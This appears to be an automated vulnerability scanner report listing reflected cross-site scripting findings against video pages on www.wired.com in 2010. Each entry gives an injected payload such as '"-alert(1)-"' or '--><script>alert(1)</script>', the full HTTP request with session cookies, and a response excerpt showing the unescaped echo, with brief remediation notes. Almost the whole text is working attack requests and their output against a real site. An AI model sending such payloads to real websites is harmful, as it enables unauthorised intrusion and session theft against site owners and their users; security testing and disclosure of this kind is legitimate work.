The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4491f"><a>9cbbc7d96ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlights4491f"><a>9cbbc7d96ba/1716440574/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:48:12 GMT Date: Mon, 22 Nov 2010 00:43:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106750
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlights4491f"><a>9cbbc7d96ba"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0ecf"-alert(1)-"04fbf34cd7d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574b0ecf"-alert(1)-"04fbf34cd7d/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:30 GMT Date: Mon, 22 Nov 2010 00:44:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f802"-alert(1)-"db921583906 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer4f802"-alert(1)-"db921583906/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:58 GMT Date: Mon, 22 Nov 2010 00:44:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 257cc"-alert(1)-"009132a34db was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001257cc"-alert(1)-"009132a34db HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=275 Expires: Mon, 22 Nov 2010 00:49:50 GMT Date: Mon, 22 Nov 2010 00:45:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 7e5d9--><script>alert(1)</script>896031a1734 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video7e5d9--><script>alert(1)</script>896031a1734/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29471 Vary: Accept-Encoding Cache-Control: max-age=287 Expires: Mon, 22 Nov 2010 00:47:35 GMT Date: Mon, 22 Nov 2010 00:42:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video7e5d9--><script>alert(1)</script>896031a1734/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45aaf"><a>68a6a917189 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video45aaf"><a>68a6a917189/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29436 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:07 GMT Date: Mon, 22 Nov 2010 00:42:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video45aaf"><a>68a6a917189 ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f13c4"-alert(1)-"79997b02692 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videosf13c4"-alert(1)-"79997b02692/highlights/1716440574/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:16 GMT Date: Mon, 22 Nov 2010 00:44:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106771
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e5c"><a>188f8a9d4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videosc9e5c"><a>188f8a9d4e/highlights/1716440574/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:56 GMT Date: Mon, 22 Nov 2010 00:42:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videosc9e5c"><a>188f8a9d4e c_highlights"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f024"><a>62c7cdde06 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlights5f024"><a>62c7cdde06/1716440574/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:26 GMT Date: Mon, 22 Nov 2010 00:44:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlights5f024"><a>62c7cdde06"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e35b7"-alert(1)-"02dcf902f19 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlightse35b7"-alert(1)-"02dcf902f19/1716440574/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=288 Expires: Mon, 22 Nov 2010 00:50:38 GMT Date: Mon, 22 Nov 2010 00:45:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106725
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59286"-alert(1)-"69a9f6b985b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/171644057459286"-alert(1)-"69a9f6b985b/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:51:11 GMT Date: Mon, 22 Nov 2010 00:46:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b7af"-alert(1)-"c7c42779efd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international6b7af"-alert(1)-"c7c42779efd/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=289 Expires: Mon, 22 Nov 2010 00:51:09 GMT Date: Mon, 22 Nov 2010 00:46:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106743
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f751c"-alert(1)-"9e4be7cf9e3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001f751c"-alert(1)-"9e4be7cf9e3 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=299 Expires: Mon, 22 Nov 2010 00:51:36 GMT Date: Mon, 22 Nov 2010 00:46:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload bbeb0--><script>alert(1)</script>92733e52164 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videobbeb0--><script>alert(1)</script>92733e52164/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29479 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:20 GMT Date: Mon, 22 Nov 2010 00:45:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videobbeb0--><script>alert(1)</script>92733e52164/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfe95"><a>e214857df01 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videocfe95"><a>e214857df01/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29444 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:44 GMT Date: Mon, 22 Nov 2010 00:44:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videocfe95"><a>e214857df01 ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e2b9"><a>01f61234896 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos7e2b9"><a>01f61234896/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:31 GMT Date: Mon, 22 Nov 2010 00:45:31 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106790
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos7e2b9"><a>01f61234896 c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ba47"-alert(1)-"40453ca693 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos7ba47"-alert(1)-"40453ca693/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=287 Expires: Mon, 22 Nov 2010 00:51:17 GMT Date: Mon, 22 Nov 2010 00:46:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
